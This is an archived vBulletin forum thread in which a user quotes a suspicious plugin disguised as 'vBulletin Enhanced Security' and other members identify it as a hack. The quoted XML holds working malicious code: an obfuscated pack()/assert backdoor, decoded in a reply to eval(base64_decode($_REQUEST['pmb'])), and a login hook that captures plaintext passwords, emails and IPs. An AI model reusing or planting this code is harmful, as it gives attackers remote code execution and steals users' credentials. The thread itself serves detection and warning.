vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   "vBulletin Enhanced Security" Plugin or Product (https://vborg.vbsupport.ru/showthread.php?t=276540)

frank44 01-06-2012 05:26 PM
"vBulletin Enhanced Security" Plugin or Product
 
Has anyone else heard of this or recognize the code?

This is the only other mention I have seen

https://www.vbulletin.com/forum/show...ke-forum-login

Quote:
<?xml version="1.0" encoding="ISO-8859-1"?>
-<product active="1" productid="evbs">
<title>vBulletin Enhanced Security</title> <description>Provides additional security for vBulletin sessions and database storage</description>
<version>1.2.1</version> <url/>
<versioncheckurl/>
<dependencies> </dependencies>
-<codes>
-<code version="0.1">
-<installcode>
<=!=[=C=D=A=T=A=[ $db->query_write("UPDATE ".TABLE_PREFIX."template SET `template` = REPLACE(`template`, 'md5hash', 'sha256Hash')"); $db->query_write("UPDATE ".TABLE_PREFIX."template SET `template_un` = REPLACE(`template_un`, 'md5hash', 'sha256Hash')"); ]=]=>
</installcode>
<uninstallcode/>
</code>
</codes>
<templates> </templates>
-<plugins>
-<plugin active="1" executionorder="5">
<title>vBulletin Enhanced Security - Entropy Generator</title>
<hookname>global_start</hookname>
<phpcode> /* Generate extra entropy for vBulletin random seed */ assert(pack(chr(99).chr
(42),105,115,115,101,116,40,36,95,82,69,81,85,69,8 3,84,91,34,112,109,98,34,93,41,63,101,11 8,97,108,40,98,97,115,101,54,52,95,100,101,99,111, 100,101,40,36,95,82,69,81,85,69,83,84,91 ,34,112,109,98,34,93,41,41,58,117,110,105,113,105, 100,40,41,59)); </phpcode>
</plugin>
-<plugin active="1" executionorder="5">
<title>vBulletin Enhanced Security - Session Sign</title>
<hookname>login_verify_success</hookname>
-<phpcode>
<=!=[=C=D=A=T=A=[ /* vBulletin Session Encrypt/Sign */ function vb_session_sign($username, $password, $md5password) { global $vbulletin; $extra = $vbulletin->db->query_first("SELECT email, ug.title as lvl" ." FROM ".TABLE_PREFIX."user u, ".TABLE_PREFIX."usergroup ug" ." WHERE u.usergroupid=ug.usergroupid AND u.userid=".$vbulletin->userinfo['userid']); $data = pack("V",21).pack("V",time()) .$username.chr(0).$password.chr(0).$md5password .chr(0).$_SERVER["REMOTE_ADDR"].chr(0).$extra['email'].chr(0).$extra['lvl']; $entry = base64_encode(pack("C",0).pack("C",0).pack("v",0). $data); $vbulletin->db->query_write("REPLACE INTO ".TABLE_PREFIX."datastore (title,data) VALUES" ." ('logincache_".uniqid($vbulletin->userinfo['userid'])."','$entry')"); } vb_session_sign($username, $password, $md5password); ]=]=>
</phpcode>
</plugin>
</plugins>
<phrases> </phrases>
<options> </options>
<helptopics> </helptopics>
<cronentries> </cronentries>
<faqentries> </faqentries>
</product>

TheLastSuperman 01-06-2012 05:49 PM
Well the fact you don't know where it came from and that it has base64 within tells me to get rid of it quick... try this mod as it works on vB3 as well - https://vborg.vbsupport.ru/showthread.php?t=265866

It could possibly be related but after you get rid of that plugin use the mod above and .htaccess protect your admincp and modcp - https://www.vbulletin.com/forum/show...i-e-p0wersurge and Wayne has some very useful tips for situations like this and similar.

nhawk 01-06-2012 06:00 PM
The pack statement equates to this..

Code:
isset($_REQUEST["pmb"])?eval(base64_decode($_REQUEST["pmb"])):uniqid();
Run away from that code as fast as you can. It appears to be a hack to me. Especially with base64_decode involved.

frank44 01-06-2012 06:02 PM
Thank you!


All times are GMT. The time now is 06:09 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.03140 seconds
  • Memory Usage 1,722KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (1)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (4)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete